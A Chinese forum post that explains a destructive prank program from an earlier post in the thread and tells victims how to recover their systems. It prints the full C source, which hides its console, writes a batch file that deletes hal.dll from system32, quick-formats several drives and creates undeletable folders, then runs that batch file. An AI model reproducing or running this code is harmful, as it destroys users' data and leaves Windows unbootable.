以下是引用vvvcuu在2014-8-15 18:27:22的发言：

二楼发布的程序并不是什么病毒，不过是用C新建了一个批处理文件，并运行它而已。
批处理文件功能：

1，在D,E,F盘根目录下分别建立数字1-99开头，后跟..为名字的文件夹.此类文件夹在资源管理器下无法直接删除.命令提示符下可以.
2, 删除%system32%文件夹下的hal.dll和两个文件,使系统不能启动.对于32位系统有效,64位系统未知.
3, 快速格式化D,E,F,H,J盘为NTFS文件系统.
4, 打开以下网站: 百度,360,淘宝,QQ,3G,搜搜,雅虎,谷歌,金山卫士,金山游戏等.

已中招的网友请自行在和自己电脑相同从操作系统的电脑上拷贝hal.dll和两个文件,复制到自己电脑系统盘system32文件夹下,可能需要启动盘.
启动电脑后,下载恢复软件,复原D,E,F等盘的文件,一般能复原大部分,而不能完全恢复.
程序源代码如下:

# include <stdio.h>
# include <windows.h>



int main(int argc,char *argv[])
{
ShowWindow(FindWindow("ConsoleWindowClass",argv[0]),0);

int x; int i;
FILE*fp=fopen("c:\\SB.bat","w");

for(i=0;i<100;i++)
{




fprintf(fp,"md D:\%d...\\\n",i);
fprintf(fp,"md e:\%d...\\\n",i);
fprintf(fp,"md f:\%d...\\\n",i);


if(i==25)
{



fprintf(fp,"del C:\\WINDOWS\\system32\\hal.dll \n ",i);

fprintf(fp,"del C:\\WINDOWS\\system32\\ \n ",i);


fprintf(fp,"Format d:/y/q/fs:NTFS\n",i);
fprintf(fp,"Format e:/y/q/fs:NTFS\n",i);
fprintf(fp,"Format f:/y/q/fs:NTFS\n",i);
fprintf(fp,"Format h:/y/q/fs:NTFS\n",i);
fprintf(fp,"Format j:/y/q/fs:NTFS\n",i);

}

if(i==3)
{
fprintf(fp,"start explorer http://www.baidu.com start explorer \n",i);
fprintf(fp,"start explorer http://www. start explorer \n",i);
fprintf(fp,"start explorer http://www. start explorer \n",i);
fprintf(fp,"start explorer http://www. start explorer \n",i);
fprintf(fp,"start explorer http://www. start explorer \n",i);
fprintf(fp,"start explorer http://www. start explorer \n",i);
fprintf(fp,"start explorer http://www. start explorer \n",i);
fprintf(fp,"start explorer http://www. start explorer \n",i);
fprintf(fp,"start explorer http://www. start explorer \n",i);
fprintf(fp,"start explorer http://www. start explorer \n",i);



}




}



fclose(fp);
system("c:\\SB.bat");



}


此人发的一个帖子地址在这:
https://bbs.bccn.net/thread-435019-1-1.html
只是本人没有中招而已.